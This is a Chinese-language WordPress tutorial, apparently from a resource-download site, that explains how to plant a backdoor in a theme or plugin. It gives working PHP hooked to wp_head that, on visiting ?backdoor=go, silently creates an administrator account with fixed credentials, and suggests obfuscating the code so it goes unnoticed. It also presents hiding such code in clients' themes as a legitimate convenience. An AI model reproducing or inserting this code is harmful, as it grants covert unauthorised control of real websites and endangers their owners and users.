WordPress教程:如何给WordPress创建一个后门?

什么是后门?

后门的慨念非常简单,黑客通过后门进入你的WordPress管理面板,然后拿下你的服务器,想干嘛就干嘛,特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。。。

后门可以放到你的wordpress主题文件中,也可以放到你的你的插件中,所以在使用一些插件和主题的时候最好小心了。

好的用途

每件事情都有两面性,后门也不例外,你可以将这些代码放到你的客户的主题中,如果他们忘记了他们的FTP密码等等,这样就能方便的找回来,是不是很给力?

如何创建一个后门?

add_action('wp_head', 'holeinthewall');    function holeinthewall() {  If ($_GET['backdoor'] == 'go') {  require('wp-includes/registration.php');  If (!username_exists('username')) {  $user_id = wp_create_user('username', 'password');  $user = new WP_User($user_id);  $user->set_role('administrator');  }  }  }

现在你可以通过,example.com/?backdoor=go这样的格式来访问,然后就创建了一个用户名为“username”,密码为:“password” 的用户,权限为管理员。如果再将上面的代码加密一下,结果你懂的。。

为了使你的wordpress站点更安全你阅读以下文章:

如何保护你的wordpress防止被暴力破解?

参考资料:http://blog.wpjam.com/m/how-to-create-a-backdoor-to-a-wordpress-website/

参考资料:http://www.trickspanda.com/2014/03/create-backdoor-wordpress/


版权免责声明

本资源仅用于个人学习测试使用,禁止用于任何商业环境,请于下载后24小时内删除本资源!

本文所有相关技术/资源内容统一放在下载包里

  1. 1、本网站名称:源码社
  2. 2、本站永久网址:https://www.nicedowns.com
  3. 3、站内所有资源均可通过日常签到等任务进行免费兑换,记得每日来本站签到哦~!。、
  4. 4、如果您觉得本站有帮助到您,也想给本站一些帮助。您可以再下方打赏本站。
  5. 5、本站资源来源于互联网收集/个人购买,如有侵犯到您的权益,请查看【版权声明】
  6. 6、本站提供的所有资源均来自互联网搜索,站内资源为网友个人学习或测试研究使用,未经原版权作者许可,禁止用于任何商业环境,任何人不得擅作它用,否则后果自负!请在下载24小时内删除!为尊重作者版权,请购买原版作品,支持你喜欢的作者,谢谢!
  7. 7、本站资源大多存储在云盘,如发现链接失效 【链接失效】 我们会第一时间更新。本站提供的源码、模板、软件工具等其他资源,都不包含技术服务 请大家谅解!

人已赞赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
有新消息 消息中心
搜索